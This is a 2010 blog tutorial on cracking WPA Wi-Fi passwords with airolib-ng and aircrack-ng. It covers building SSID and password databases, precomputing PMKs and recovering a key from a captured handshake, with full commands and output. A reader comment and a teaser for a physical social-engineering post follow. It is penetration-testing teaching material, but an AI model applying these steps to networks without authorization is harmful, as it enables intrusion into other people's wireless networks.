Friday, February 19, 2010

Airolib-ng WPA cracking walk through

I use to crack my WPA passwords with cowpatty precomputed hashes, but another way to crack WPA with hashed values is to create airolib databases with lists of SSID’s and Passwords. Airolib will create these databases with SQLite3. This is convenient because you can have more than one SSID and Password list in each database.  If you are in an area with multiple SSID’s running WPA you can note all of the SSID’s in a list and import them into the database.  This is great because when doing a packet capture in an environment with multiple WPA encrypted networks, the attacker can crack any of the 4way Authentication Handshakes with the same database file.  Below is a play by play of cracking a WPA wireless network using the airolib/aircrack method.   
Note:  I assume you already have a packet capture of a handshake.... If not just run airodump until you obtain a handshake, or for the sake of practice you can just turn your victim card on and off to catch a capture while airodump is running on that channel.  I also assume you know the old way of cracking wpa.. If not I can post a guide on how to do that...

Setting up the databases:
First you need to create a SQLite3 database and import some SSID’s to the new database. If no database is already created then Airolib will create one for you automatically. Create a list of SSID’s from your Airodump output. Then use the Airolib command in the following format.

Airolib-ng    --import essid 

Create SSID list:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
Database does not already exist, creating it...
Database sucessfully created
Reading file...
Writing...
Done.

Next import your password list into the same database with the same format as when you added SSID’s to the database but replacing the keyword to passwd and adding your password list. Here is the format for this followed by an example.

Airolib-ng   --import  

Create Password List:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
Reading file...
Writing...
Done.
This next command is an optional command called “clean” that will run integrity checks on the database and reduce the size of your database if possible.

Clean Database:
Example:
root@ ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.

Create your PMK’s:
After you have imported all your SSID’s and Passwords you can create PMK hashes with the following command.

root@ ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.

Cracking:
Now that you have databases of PMK hashes for the WPA SSID’s in your area you can run a crack against your Output cap file to retrieve your password. If all goes well and the networks password is in your database you are done.

Example:
root@ ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Opening Output-02.cap
Read 3347 packets.
   #  BSSID                               ESSID                     Encryption
   1  00:18:F8:66:7E:CC        ficti0nAP               WPA (1 handshake)
Choosing first network as target.
Opening Output-02.cap
                                 Aircrack-ng 1.0 r1645
                   [00:00:00] 1 keys tested (240.91 k/s)
                         KEY FOUND! [ MyPassword ] 
      Master Key     : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
                       67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
      Transient Key  : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
                       FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
                       00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
                       1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
      EAPOL HMAC     : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Quitting aircrack-ng...

Optional:
Another useful option if you want to crack all the WPA networks but you want to set the priority on a specific network you can run this sql command to set that priority in the database. Try the following command to set your network as a priority.
root@ficti0n:~#  airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.



1 comment:

  1. Thanks ! Very easy and 100 % Working.

    Just add a command to help while creating text file containing ESSIDs.
    for example:
    echo [AccessPoint Name or BSSID] > filename.txt

    ReplyDelete

Note: Only a member of this blog may post a comment.

Real World Social Engineering Part 2: Integrating SE With Stealth Badge Readers Tips and Tricks

 Below is a video on using stealth readers with social engineering to gain access to physical targets on your penetration tests..   This is ...